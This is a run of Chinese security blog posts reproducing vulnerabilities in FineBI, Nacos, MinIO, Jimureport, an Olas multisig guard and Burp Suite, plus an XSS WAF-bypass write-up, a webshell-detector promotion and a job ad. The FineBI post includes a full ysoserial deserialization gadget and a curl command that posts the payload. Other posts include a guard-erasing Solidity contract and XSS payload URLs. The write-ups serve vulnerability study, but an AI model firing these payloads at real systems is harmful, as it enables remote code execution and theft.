public static String a(String var0, Map var1) {        if (var0 == null) {            return null;        } else {            Configuration var2 = new Configuration();            var2.setNumberFormat("#.#########");            var2.setSharedVariable("func", new FunctionMethod());            var1.put("jeecg", new FreemarkerMethod());            var1.put("isNotEmpty", new NotEmptyMethod());            var2.setClassicCompatible(true);            StringWriter var3 = new StringWriter();
            try {                a.debug("模板内容:{}", var0.toString());                (new Template("template", new StringReader(var0), var2)).process(var1, var3);                a.debug("模板解析结果:{}", var3.toString());            } catch (TemplateException var5) {                var5.printStackTrace();            } catch (IOException var6) {                var6.printStackTrace();            }
            return var3.toString();        }    }

漏洞修复

更新到最新代码后，直接访问发现提示token检验识别

但是在shiro中并没有对这个权限进行校验

//积木报表排除filterChainDefinitionMap.put("/jmreport/**", "anon");

根据日志o.j.m.j.c.f.interceptor.JimuReportTokenInterceptor:131 可以找到相关的过滤代码

public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {        if (!(handler instanceof HandlerMethod)) {            return true;        } else {            String var4 = e.j(request.getRequestURI().substring(request.getContextPath().length()));            short var5 = 500;            if (m.a(var4)) {                log.error("请注意，请求地址有xss攻击风险！" + var4);                this.backError(response, "请求地址有xss攻击风险!", Integer.valueOf(var5));                return false;            } else {                String var6 = this.jmBaseConfig.getCustomPrePath();                if (OkConvertUtils.isNotEmpty(var6) && !var6.startsWith("/")) {                    var6 = "/" + var6;                }
                request.setAttribute("customPrePath", var6);                HandlerMethod var7 = (HandlerMethod)handler;                Method var8 = var7.getMethod();                if (var4.contains("/jmreport/shareView/")) {                    return true;                } else {                    JimuNoLoginRequired var9 = (JimuNoLoginRequired)var8.getAnnotation(JimuNoLoginRequired.class);                    if (OkConvertUtils.isNotEmpty(var9)) {                        return true;                    } else {                        boolean var10 = false;
                        try {                            var10 = this.verifyToken(request);                        } catch (Exception var14) {                        }
                        if (!var10) {                            if (this.jimuReportShareService.isSharingEffective(var4, request)) {                                return true;                            } else {                                String var16 = request.getParameter("previousPage");                                if (OkConvertUtils.isNotEmpty(var16)) {                                    if (!var4.startsWith("/jmreport/view")) {                                        log.error("不被允许的钻取请求地址(" + request.getMethod() + ")：" + var4);                                        this.backError(response, "Token校验失败，无权限访问！", Integer.valueOf(var5));                                        return false;                                    } else if (this.jimuReportShareService.isShareingToken(var4, request)) {                                        return true;                                    } else {                                        log.error("分享链接失效或分享token不匹配(" + request.getMethod() + ")：" + var4);                                        this.backError(response, "分享链接失效或分享token不匹配，禁止钻取!", Integer.valueOf(var5));                                        return false;                                    }                                } else {                                    log.error("Token校验失败！请求无权限(" + request.getMethod() + ")：" + var4);                                    this.backError(response, "Token校验失败，无权限访问！", Integer.valueOf(var5));                                    return false;                                }                            }                        } else {                            RequiresRoles var15 = (RequiresRoles)var8.getAnnotation(RequiresRoles.class);                            Result var11 = this.permissionsVerifyHandler.verifyRoles(request, var15, var4);                            if (OkConvertUtils.isNotEmpty(var11) && !var11.isSuccess()) {                                this.backError(response, OkConvertUtils.getString(var11.getMessage(), "没有权限，请联系管理员分配权限！"), OkConvertUtils.getInt(var11.getCode(), var5));                                return false;                            } else {                                RequiresPermissions var12 = (RequiresPermissions)var8.getAnnotation(RequiresPermissions.class);                                Result var13 = this.permissionsVerifyHandler.verifyPermissions(request, var12);                                if (OkConvertUtils.isNotEmpty(var13) && !var13.isSuccess()) {                                    this.backError(response, OkConvertUtils.getString(var13.getMessage(), "没有权限，请联系管理员分配权限！"), OkConvertUtils.getInt(var13.getCode(), var5));                                    return false;                                } else {                                    return true;                                }                            }                        }                    }                }            }        }    }

如果方法没有使用JimuNoLoginRequired注解就需要验证token，并且强制要求url以/jmreport/view开头，否则不允许访问

参考文档

https://help.jeecg.com/java/setup/idea/startup.html

阅读原文

跳转微信打开

帆软Finebi_V5.1.10_channel反序列化漏洞复现

Tue, 07 Jan 2025 16:22:00 +0800

原创 kkk 2025-01-07 16:22 广东

1.安装

复现版本:FineBI V5.1.10

安装后，后台地址 webroot/decision/login

2.反编译

找到所有以fine开头的包，复制到单独文件夹进行反编译

3.漏洞复现

在fine-decision-report-11.0/com/fr/decision/extension/report/api/remote/RemoteDesignResource.java文件中找到目录路由

漏洞路由

http://localhost:37799/webroot/decision/remote/design/channel

但是在帆软的官方安装包下，没有找到调试的方法，我们把源代码webroot放到tomcat的webapps目录下

设置tomcat debug

mac

chmod u+x *.sh

新增文件setenv.sh

JPDA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005"

然后再修改startup.sh,将最后一句改写成

exec "$PRGDIR"/"$EXECUTABLE" jpda start "$@"

windows

setenv.bat

set JPDA_ADDRESS=5005set JPDA_TRANSPORT=dt_socket

startup.bat 加上jpda

call "%EXECUTABLE%" jpda start %CMD_LINE_ARGS%

然后通过jdk1.8,通过Windows启动tomcat，成功启动

但是经过测试，帆软清除了java包里面的行信息，导致在代码里面下断点，但是还是可以在方法中下断点的。

代码分析

输入的input流最后，经过层层转转以后到了InvocationSerializer class的deserialize方法

大概流程如下:

传递到WorkspaceServerInvoker的handleMessage方法

然后继续调用this.deserializeInvocation方法

SerializerHelper的deserialize方法

然后进入InvocationSerializer的deserialize方法

然后在这里就触发了readObject方法

为了方便测试漏洞，我们可以直接写一个class来进行触发

package Main;
import com.fr.rpc.serialization.InvocationSerializer;
import java.io.File;import java.io.FileInputStream;
public class Main {
    public static void main(String[] args) throws Exception {        File file = new File("./test.bin");        FileInputStream fileInputStream = new FileInputStream(file);        InvocationSerializer invocationSerializer = InvocationSerializer.getDefault();        invocationSerializer.deserialize(fileInputStream);    }}

Java反序列化

首先我们学习一下Java反序列化的知识

User.java

package Main;
import java.io.Serializable;
public class User implements Serializable {    public int age;    public String name;
    public User(int age, String name) {        this.age = age;        this.name = name;    }
    private void readObject(java.io.ObjectInputStream stream) throws Exception {        stream.defaultReadObject();        System.out.println("User readObject");    }}

Main.java

package Main;
import com.fr.rpc.serialization.InvocationSerializer;
import java.io.*;import java.util.HashMap;import java.util.Objects;
public class Main {
    public static void main(String[] args) throws Exception {                User user = new User(18, "mbx");        FileOutputStream fileOutputStream = new FileOutputStream("./test.bin");        ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);        objectOutputStream.writeObject(user);        objectOutputStream.close();        //        FileInputStream fileIn = new FileInputStream("./test.bin");        ObjectInputStream in = new ObjectInputStream(fileIn);        File file = (File) in.readObject();    }}

执行以后，readobject方法成功执行

比较容易出反序列化漏洞的就是重写了readObject方法，还有就是hashCode方法,反序列化Hashmap触发readObject 的时候就会触发hashCode方法。

构造Exp

ysoserial项目下新增一个文件src/main/java/ysoserial/payloads/FineHibernate1.java

这个文件是个根据Hibernate1这个文件改来的，替换了部分帆软包名·

package ysoserial.payloads;

import com.fr.third.org.hibernate.EntityMode;import com.fr.third.org.hibernate.engine.spi.TypedValue;import com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer;import com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer;import com.fr.third.org.hibernate.type.AbstractType;import com.fr.third.org.hibernate.type.ComponentType;import com.fr.third.org.hibernate.type.Type;import ysoserial.payloads.annotation.Authors;import ysoserial.payloads.annotation.PayloadTest;import ysoserial.payloads.util.Gadgets;import ysoserial.payloads.util.JavaVersion;import ysoserial.payloads.util.PayloadRunner;import ysoserial.payloads.util.Reflections;
import java.lang.reflect.Array;import java.lang.reflect.Constructor;import java.lang.reflect.InvocationTargetException;import java.lang.reflect.Method;import java.util.HashMap;import java.util.Map;

/** * * com.fr.third.org.hibernate.property.access.spi.GetterMethodImpl.get() * com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue() * com.fr.third.org.hibernate.type.ComponentType.getPropertyValue(C) * com.fr.third.org.hibernate.type.ComponentType.getHashCode() * com.fr.third.org.hibernate.engine.spi.TypedValue$1.initialize() * com.fr.third.org.hibernate.engine.spi.TypedValue$1.initialize() * com.fr.third.org.hibernate.internal.util.ValueHolder.getValue() * com.fr.third.org.hibernate.engine.spi.TypedValue.hashCode() * * * Requires: * - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only) * * @author mbechler */@Authors({ Authors.MBECHLER })@PayloadTest(precondition = "isApplicableJavaVersion")public class FineHibernate1 implements ObjectPayload, DynamicDependencies {    public static boolean isApplicableJavaVersion() {        return JavaVersion.isAtLeast(7);    }
    public static String[] getDependencies () {        if ( System.getProperty("hibernate5") != null ) {            return new String[] {                "com.fr.third.org.hibernate:hibernate-core:5.0.7.Final", "aopalliance:aopalliance:1.0", "org.jboss.logging:jboss-logging:3.3.0.Final",                "javax.transaction:javax.transaction-api:1.2"            };        }
        return new String[] {            "com.fr.third.org.hibernate:hibernate-core:4.3.11.Final", "aopalliance:aopalliance:1.0", "org.jboss.logging:jboss-logging:3.3.0.Final",            "javax.transaction:javax.transaction-api:1.2", "dom4j:dom4j:1.6.1"        };
    }

    public static Object makeGetter ( Class tplClass, String method ) throws Exception {        return makeHibernate5Getter(tplClass, method);        // return makeHibernate5Getter(tplClass, method);        // if ( System.getProperty("hibernate5") != null ) {        //     return makeHibernate5Getter(tplClass, method);        // }        // return makeHibernate4Getter(tplClass, method);    }

    public static Object makeHibernate4Getter ( Class tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,            SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {        Class getterIf = Class.forName("com.fr.third.org.hibernate.property.access.spi.Getter");        Class basicGetter = Class.forName("com.fr.third.org.hibernate.property.BasicPropertyAccessor$BasicGetter");        Constructor bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);        Reflections.setAccessible(bgCon);
        if ( !method.startsWith("get") ) {            throw new IllegalArgumentException("Hibernate4 can only call getters");        }
        String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);
        Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);        Object arr = Array.newInstance(getterIf, 1);        Array.set(arr, 0, g);        return arr;    }

    public static Object makeHibernate5Getter ( Class tplClass, String method ) throws NoSuchMethodException, SecurityException,            ClassNotFoundException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {        Class getterIf = Class.forName("com.fr.third.org.hibernate.property.access.spi.Getter");        Class basicGetter = Class.forName("com.fr.third.org.hibernate.property.access.spi.GetterMethodImpl");        Constructor bgCon = basicGetter.getConstructor(Class.class, String.class, Method.class);        Object g = bgCon.newInstance(tplClass, "test", tplClass.getDeclaredMethod(method));        Object arr = Array.newInstance(getterIf, 1);        Array.set(arr, 0, g);        return arr;    }

    public Object getObject ( String command ) throws Exception {        Object tpl = Gadgets.createTemplatesImpl(command);        Object getters = makeGetter(tpl.getClass(), "getOutputProperties");        return makeCaller(tpl, getters);    }

    static Object makeCaller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,            InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {        if ( System.getProperty("hibernate3") != null ) {            return makeHibernate3Caller(tpl, getters);        }        return makeHibernate45Caller(tpl, getters);    }

    static Object makeHibernate45Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,            InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {        PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);        Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
        ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);        Reflections.setFieldValue(t, "componentTuplizer", tup);        Reflections.setFieldValue(t, "propertySpan", 1);        Reflections.setFieldValue(t, "propertyTypes", new Type[] {            t        });
        TypedValue v1 = new TypedValue(t, null);        Reflections.setFieldValue(v1, "value", tpl);        Reflections.setFieldValue(v1, "type", t);
        TypedValue v2 = new TypedValue(t, null);        Reflections.setFieldValue(v2, "value", tpl);        Reflections.setFieldValue(v2, "type", t);
        return Gadgets.makeMap(v1, v2);    }

    static Object makeHibernate3Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,            InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {        // Load at runtime to avoid dependency conflicts        Class entityEntityModeToTuplizerMappingClass = Class.forName("com.fr.third.org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping");        Class entityModeToTuplizerMappingClass = Class.forName("com.fr.third.org.hibernate.tuple.EntityModeToTuplizerMapping");        Class typedValueClass = Class.forName("com.fr.third.org.hibernate.engine.TypedValue");
        PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);        Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);        Reflections.getField(AbstractComponentTuplizer.class, "propertySpan").set(tup, 1);
        ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);        HashMap hm = new HashMap();        hm.put(EntityMode.POJO, tup);        Object emtm = Reflections.createWithConstructor(entityEntityModeToTuplizerMappingClass, entityModeToTuplizerMappingClass, new Class[]{ Map.class }, new Object[]{ hm });        Reflections.setFieldValue(t, "tuplizerMapping", emtm);        Reflections.setFieldValue(t, "propertySpan", 1);        Reflections.setFieldValue(t, "propertyTypes", new Type[] {            t        });
        Constructor typedValueConstructor = typedValueClass.getDeclaredConstructor(Type.class, Object.class, EntityMode.class);        Object v1 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);        Reflections.setFieldValue(v1, "value", tpl);        Reflections.setFieldValue(v1, "type", t);
        Object v2 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);        Reflections.setFieldValue(v2, "value", tpl);        Reflections.setFieldValue(v2, "type", t);
        return Gadgets.makeMap(v1, v2);    }

    public static void main ( final String[] args ) throws Exception {        PayloadRunner.run(FineHibernate1.class, args);    }}

转换成gzip的文件

        FileInputStream fileIn = new FileInputStream("./test.bin");        byte[] var3 = IOUtils.inputStream2Bytes(fileIn);        OutputStream out = new GZIPOutputStream(new FileOutputStream("./g.bin"));        out.write(var3);        out.close();
        FileInputStream gfileIn = new FileInputStream("./g.bin");        byte[] var4 = IOUtils.inputStream2Bytes(gfileIn);        WorkContext.setMessageHandler(new WorkspaceServerInvoker());        WorkContext.handleMessage(var4);

通过curl发送payload

curl --data-binary @g.bin http://192.168.3.168:8080/webroot/decision/remote/design/channel

二次反序列化漏洞复现

在readParams方法中，存在二次反序列化

修改PayloadRunner的run方法

public static void run(final ClassObjectPayload<?>> clazz, final String[] args) throws Exception {        // ensure payload generation doesn't throw an exception        byte[] serialized = new ExecCheckingSecurityManager().callWrapped(new Callable() {            public byte[] call() throws Exception {                final String command = args.length > 0 && args[0] != null ? args[0] : getDefaultTestCmd();
                System.out.println("generating payload object(s) for command: '" + command + "'");
                ObjectPayload payload = clazz.newInstance();                final Object objBefore = payload.getObject(command);                System.out.println("serializing payload");                byte[] ser = Serializer.serialize(objBefore);
                //FileOutputStream fileOutputStream = new FileOutputStream("test.bin");                //InvocationSerializer invocationSerializer = new InvocationSerializer(null);                //Method method = invocationSerializer.getClass().getDeclaredMethod("writeParams", Object[].class);                //method.setAccessible(true);                //Object[] myArgs = new Object[1];                //myArgs[0] = objBefore;                //method.invoke(myArgs);                //fileOutputStream.write(Serializer.serialize(invocationSerializer));                //fileOutputStream.close();                //InvocationPack invocationPack = new InvocationPack()
                Class[] innerClasses = InvocationSerializer.class.getDeclaredClasses();                Class innerClass = null;                for (Class cls : innerClasses) {                    if (cls.getSimpleName().equals("InvocationPack")) {                        innerClass = cls;                    }                }                Constructor constructor = innerClass.getDeclaredConstructor(String.class, String.class, Class[].class, byte[][].class);                constructor.setAccessible(true);                InvocationSerializer invocationSerializer = new InvocationSerializer(null);                byte[] s = ser;                byte[][] b = new byte[1][];                b[0] = new byte[ser.length];                System.arraycopy(ser, 0, b[0], 0, ser.length);                Class[] c = new Class[]{String.class};                Object innerObject = constructor.newInstance( "a", "a", c, b);                //byte[] ser2 = Serializer.serialize(innerObject);                //FileOutputStream fileOutputStream = new FileOutputStream("2test.bin");                //fileOutputStream.write(ser2);                Map map = new HashMap();                //fileOutputStream.write(Serializer.serialize(map));                //fileOutputStream.close();
                ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("object.txt"));                oos.writeObject(innerObject);                oos.writeObject(map);                Utils.releasePayload(payload, objBefore);                return ser;            }        });
        try {            System.out.println("deserializing payload");            final Object objAfter = Deserializer.deserialize(serialized);        } catch (Exception e) {            e.printStackTrace();        }
    }

阅读原文

跳转微信打开

nacos_后台rce分析

Mon, 29 Jul 2024 00:06:00 +0800

原创 kkk mr 2024-07-29 00:06 浙江

环境搭建

适用 vulhub这个项目来启动漏洞环境

vulhub的nacos版本是 1.4.0，通过github下载源代码

https://github.com/alibaba/nacos/tree/1.4.0

因为vulhub已经默认开放了debug端口，所以直接自己idea jvm远程调试即可

漏洞分析

从 poc来看问题出在 /nacos/v1/cs/ops/data/removal 和 /nacos/v1/cs/ops/derby 这两个接口

removal 代码位于 config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java:133

importDerby方法使用了Secured注解进行保护

Secured注解的实现在 com/alibaba/nacos/core/auth/AuthFilter.java:88

首先判断了有没有开启认证，如果没有开启就直接pass

如果开启了认证还会判断 ua是否是 Nacos-Server开头，如果是的话就pass。这就是前几年的未授权漏洞的根源

在vuln 中的nacos是没有开启auth的，所以无需关注认证

漏洞接口代码

    @PostMapping(value = "/data/removal")    @Secured(action = ActionTypes.WRITE, resource = "nacos/admin")    public DeferredResult> importDerby(@RequestParam(value = "file") MultipartFile multipartFile) {        DeferredResult> response = new DeferredResult<>();        if (!PropertyUtil.isEmbeddedStorage()) {            response.setResult(RestResultUtils.failed("Limited to embedded storage mode"));            return response;        }        DatabaseOperate databaseOperate = ApplicationUtils.getBean(DatabaseOperate.class);        WebUtils.onFileUpload(multipartFile, file -> {            NotifyCenter.publishEvent(new DerbyImportEvent(false));            databaseOperate.dataImport(file).whenComplete((result, ex) -> {                NotifyCenter.publishEvent(new DerbyImportEvent(true));                if (Objects.nonNull(ex)) {                    response.setResult(RestResultUtils.failed(ex.getMessage()));                    return;                }                response.setResult(result);            });        }, response);        return response;    }

接受一个文件，临时储存在/tmp目录下，

然后调用databaseOperate.dataImport方法进行导入，然后继续调用父类的doDataImport方法进行导入

继续调用，在batchUpdate执行了sql语句

这里调用的是spring中的template库来执行sql语句，template中的jdbcurl是

jdbc:derby:/opt/nacos/data/derby-data;create=true

derby 是一个开源的关系型数据库，是嵌入式数据库。于java中H2类似

修复措施

看官方的最新的代码，应该是默认禁用derby数据库了

通过docker搭建一个最新版运行一下

docker run --name nacos-quick -e MODE=standalone -p 8849:8848 -d nacos/nacos-server:2.0.2

执行poc 确实已经关闭了

阅读原文

跳转微信打开

智能合约漏洞复现-特权提升漏洞

Thu, 21 Mar 2024 21:42:00 +0800

原创 kkk mr 2024-03-21 21:42 浙江

本文为根据0xEVom的审计报告对漏洞进行的梳理和复现。这位小哥在对Olas合约的审计中获得了$29,515.84

源码地址:

https://github.com/code-423n4/2023-12-autonolas

安全审计报告:

https://github.com/0xEVom/audits/blob/main/code4rena/2023-12-autonolas.md

本文为根据0xEVom的审计报告对漏洞进行的梳理和复现。这位小哥在对Olas合约的审计中获得了$29,515.84

GuardCM.sol

合约文件: governance/contracts/multisigs/GuardCM.sol

根据项目中的governance/test/GuardCM.js文件来看,整体结构如下:

GuardCM实现了GnosisSafe合约中的安全检查功能。

而GnosisSafe是一个多签钱包的智能合约，在通过GnosisSafe合约执行交易的时候，会通过调用Guard的checkTransaction来进行检查，如果再checkTransaction中没有发生revert,则执行交易execute

在checkTransaction函数中主要逻辑是，如果目标地址是timelock，那么不允许进行delegatecall操作，并且只允许执行timelock中的SCHEDULE和SCHEDULE_BATCH两个函数，如果目标地址是GnosisSafe则直接revert。

但是这里存在一个问题，只有在对timelock和GnosisSafe进行delegatecall的才会revert。

在execTransaction函数中，如果guard地址不等于0，才会进行checkTransaction

guard是通过setGurad函数在合约部署的时候就进行设置的

但是checkTransaction函数中有一个非常严重的问题就是，没有限制对第三方合约进行delegatecall。

所以可以通过部署恶意合约，然后调用GnosisSafe的函数进行执行，将Gurad设置为空地址。绕过checkTransaction函数对合约交互的检查。

利用方式如下:

1.部署合约

pragma solidity ^0.8.0;
contract DelegatecallExploitContract {    bytes32 internal constant GUARD_STORAGE_SLOT = 0x4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c8;
    function deleteGuardStorage() public {        assembly {            sstore(GUARD_STORAGE_SLOT, 0)        }    }}

2.调用execTransaction函数执行

3.调用timelock执行对Gura合约的pause函数delegatecall，因为guard==address(0)执行成功

造成特权升级漏洞

阅读原文

跳转微信打开

在input标签中如何绕过waf?

Tue, 23 Jan 2024 00:36:00 +0800

原创 k 2024-01-23 00:36 浙江

在input标签中如何绕过waf?

在几个星期以前，我碰到了一个xss 漏洞

url: https://target.com/?product_name=test

在源码中显示的是

尝试直接注入script标签，来进行利用

https://target.com/?product_name=test"<

但是waf直接给script过滤了

我尝试了很多其他payload，比如img等等，但是都直接被waf过滤了。

但是我发现这个标签是在input标签中的，于是我想到了onmouseover 事件来进行利用

onmouseover事件会在鼠标指针移动到指定的对象上时触发事件发生

payload如下:

https://target.com/?product_name=test"%20oNmOuSeOvEr=prompt(1)//>

成功注入，并没有被拦截。但是比较鸡肋的是，这个事件要求用户把鼠标移动到这个小小的input上才能触发。

然后我注意到这个input后面跟的是style标签，可以用于设置元素的大小。

并且在html中先定义的属性才会生效，例如

我们可以看到元素b是没有生效的。

于是我们可以通过在前面写style，让input覆盖满整个屏幕。

payload如下:

https://target.com?product_name=admin%22style=%22height:%20100%;width:100%;position:%20absolute;top:%200;left:%200;z-index:%209999;%22%20oNmOuSeOvEr=prompt(1)//%3E

这样只要鼠标移动到网页里面就会触发prompt

稍微接近于可用状态了，后来有另一个大佬提出了一个更为完美的解决方案，通过autofocus加oNfocUs两个属性一起

onfocus 事件在对象获得焦点（光标）时发生

autofocus 设置了该属性 , 可以自动进行聚焦 , 页面加载完毕后 , 自动聚焦到设置了该属性的表单

完整payload如下:

https://target.com?product_name=admin") autofocus oNfocUs="prompt(1)"//

阅读原文

跳转微信打开

burp_crawl_rce复现-从点击劫持到rce

Tue, 07 Nov 2023 23:24:00 +0800

原创 kkk mr 2023-11-07 23:24 浙江

burp_crawl_rce复现-从点击劫持到rce

漏洞来源 https://hackerone.com/reports/1274695

漏洞环境

burpSuite 2021.7

https://portswigger-cdn.net/burp/releases/download?product=pro&version=2021.7&type=jar

poc文件见h1链接

漏洞复现

添加一个扫描任务，用于启动burp内置的无头chrome

启动以后用 python3 -m http.server启动一个http服务，然后用chrome打开burp.html

打开以后会尝试扫描本地的chrome的debug端口

扫描到了以后会创建一个iframe 地址是 http://127.0.0.1:49576/

该页面的内容为，多个A链接:

然后使用点击劫持，当点击CLICK ME以后实际上是点击 http://127.0.0.1:49576/下的 about:blank链接

iframe发生跳转,地址为

https://chrome-devtools-frontend.appspot.com/serve_file/@4bb19460e8d88c3446b360b0df8fd991fee49c0b/inspector.html?ws=127.0.0.1:49576/devtools/page/9D8411A3AA381D422364000736AE56D9&remoteFrontend=true

这个地址中包含最重要的 ws=127.0.0.1:49576/devtools/page/9D8411A3AA381D422364000736AE56D9这个地址可用于chrome调试

那么这个时候，问题就是怎么拿到这个iframe中的地址了，因为这个同源策略，我们在top页面上只能拿到http://127.0.0.1:49576/这个地址，点击a连接跳转以后的https://chrome-devtools-frontend.appspot.com这个地址我们是拿不到的

比如这个页面，我们在127上iframe到另一个域的网站，然后a链接跳转到7k7k，我们通过src拿到的还是127的地址

如果想要拿到真实的src地址，就要同源，我再iframe一个7k7k,在这个iframe下就能拿到真实的src了

于是攻击者利用了appspot.com下的一个dom xss漏洞,新建一个iframe页面，然后把地址通过postmessage发送到top页面，得到了ws地址

https://chrome-devtools-frontend.appspot.com/serve_rev/@191797/devtools.html?remoteFrontendUrl=javascript:top.postMessage(top.frames[1].location.href,"*")

拿到这个地址以后，通过chrome-remote-interface就可以操作浏览器的行为了。配置文件下载路径

然后用blob协议发起文件下载请求，就能够实现任意文件写入了

值得注意的是，这个作者实现mac rce的方式也是很有价值是通过，覆盖burp的vmoptions来实现的

给jvm设置极小的内存，burp会迅速内存耗尽，触发了OnOutOfMemoryError选项导致命令执行。

在这个案例中，一共使用了js扫描探测端口->点击劫持->dom xss->操纵浏览器实现任意文件写入->jvm rce。攻击链相当复杂，虽然实战中可利用可能性不大，但是相当具有参考价值。

阅读原文

跳转微信打开

[推荐]新型webshell检测工具-Kunwu

Sat, 20 May 2023 20:30:00 +0800

2023-05-20 20:30 浙江

1.目前webshell检测的难点

在目前的技术条件下，精准Webshell检测还是一项非常复杂事情，主要的难度在于:

多语言：Webshell的种类非常多样化，根据web环境的不同，webshell的语言包括PHP、ASP、ASP.NET、JSP等等。

版本语法差异: 不同类型的语言在不同的版本下，具有不同的语法和语言特性，比如php5和php7、jdk8和jdk18的很多语法差别就很大。这样对webshell的引擎检测的语法解析兼容性就提出了很高的要求，同时需要对语言特性有较高的了解。

加密和混淆：攻击者可以使用各种加密和混淆技术来隐藏Webshell的代码，包括字符串加密、代码混淆、反射、压缩等等。这些技术使得Webshell的代码难以被检测出来，需要使用专门的技术进行解密和分析。

2.Kunwu

昆吾进行了深度优化，内置了模糊规则、污点分析模拟执行、机器学习三种高效的检测策略。

github地址：https://github.com/kunwu2023/kunwu

检测流程

首先，模糊规则对待检测文件进行快速初步筛查，迅速判断文件是否为恶意文件。如果确定为恶意文件，则直接将其标记为恶意。反之，模糊规则会评估是否需要对文件进行深度检测。如果需要，文件将交由机器学习和污点分析模拟执行进行深度检测，确保检测速度的同时提高准确性。

策略优势

1. 模糊规则

经过大量样本的积累和实验，模糊规则能够快速判断文件的可疑程度。根据可疑程度判断是否需要深度检测，既保证了检出率，又最大限度地节省了系统资源。

2. 污点分析模拟执行

以PHP为例，首先让我们了解一下PHP的解析过程：PHP编译过程包括词法分析、语法分析，在语法分析阶段生成AST(抽象语法树)。从AST中，我们可以洞察到PHP代码的结构特点。

$func = new ReflectionFunction($_GET['m']); echo $func->invokeArgs(array($_GET['c']));

污点分析模拟执行通过遍历AST中的节点属性，对每个节点进行模拟执行。这种方法在Webshell检测中实现了高检出率和低误报率。

3. 机器学习

机器学习策略从多个角度对文件进行特征提取，可以在面对新出现的未知样本时保持较高的准确率。通过与其他检测策略相结合，机器学习策略能够在Webshell检测中实现高检出率和低误报率

3.检出率对比

样本仓库 https://github.com/BlackArch/webshells

某盾: 检测199

某马:检测196

某狗:检测211

Kunwu:207

4.误报率对比

样本来自于网络搜集的一些常用CMS，内容如下

D盾：3

河马:8

安全狗:0

Kunwu:0

5.结果对比

/	检出率	误报率	Mac支持	Linux支持	windows支持	Cli支持
某盾	87%	0.0009%	❌	❌	✅	❌
某马	85%	0.002%	❌	✅	✅	✅
某狗	92%	0%	❌	❌	✅	❌
Kunwu	90%	0%	✅	✅	✅	✅

6.迭代路线图

1.增强加密webshell的检出效果，提高检出率2.进一步优化检测速度，更快的为大家提供服务

阅读原文

跳转微信打开

[推荐]急！！！2023-国hvv招聘

Thu, 11 May 2023 22:00:00 +0800

2023-05-11 22:00 浙江

[推荐]急！！！2023-国hvv招聘

2023-HVV在即，人才需求量大，招聘竞争异常激烈，今年外包多多，我司人才服务部准备储备海量HVV人才。

单位介绍

我司是专业安全服务公司，自2021年正式以公司形式开展网络安全相关技术服务，与市场诸多主流网络安全厂商建立正式合作关系。开展服务来，我司已顺利完成2021、2022年度HW蓝队、HW红队、重保、红队评估、渗透测试、CTF培训等有关业务，输出海量人才，并获得了客户单位等一致好评。

岗位要求

A：把控整个护网行动的整体流程，有相关管理经验，对HVV现场情况和现场技术人员进行把控，具备组织领导管理能力。
B：独立分析安全相关告警提出有效解决方案、具备分析研判,流量审计,应急响应能力,熟悉红队攻击手法，有多次HVV，红队经验优先。

C：对现场相关安全设备告警进行研判、日常巡检、基线检查、有HVV,重保经验优先。
D：具备扎实的安全基础,深度理解漏洞原理，能够进行日志分析工作。

总体流程

项目地点

北上广深一线城市为主，其他为辅助。

薪资待遇

薪资待遇不对外讨论（避免引起骚乱），通过面试后有专人沟通。面试通过后统一定级，按照级别定价，一级一价，绝无二价，不会出现恶意压低或抬高价格的情况。

END

简历投递

简历格式：姓名-所在城市-级别-手机号-.pdf，文档也行。

投递邮箱：zero_sec@163.com

扫描下方二维码也可投递简历：

阅读原文

跳转微信打开

minio信息泄露漏洞及RCE复现

Sun, 23 Apr 2023 08:00:00 +0800

原创 kkk mr 2023-04-23 08:00 浙江

1.环境配置开局一张图，内容全靠编首先clone下minio项目，然后回滚到月初的commitgit che

1.环境配置

开局一张图，内容全靠编

首先clone下minio项目，然后回滚到月初的commit

git checkout 9800760cb3cd42156161c9345e4543f42ed67d0f

配一下环境参数就可以直接开run了

2.敏感信息泄露

直接搜索关键字

可以看到这个属性是由环境变量设置的，根据推测直接搜索关键字os.Environ

搜索到getLocalServerProperty函数，这个函数，参数中有request，看着好像是能访问的样子

并且下面在遍历了os.Environ，但是如果检测到环境变量名中有password或者key的话，居然会给打码。所以这个函数虽然看着很像我们需要的，但是实际上不是

后续看代码中，发现env.Get出现的很频繁，这是官方自己实现的一个包，同样也可以获取环境变量

并且Lsit方法支持同时获取多个环境变量

搜索这个函数的使用，很快就能找到getServerSystemCfg

返回MINIO开头的环境变量，看着非常符合图里的特征

往上追，能看到registerBootstrapRESTHandlers说明是一个api，我们可以访问的，需要使用POST访问，PATH是minio/bootstrap/v1/verify

但是直接访问是无法访问的，因为在这个函数里面下断点，会发现这个代码块根本没被执行到

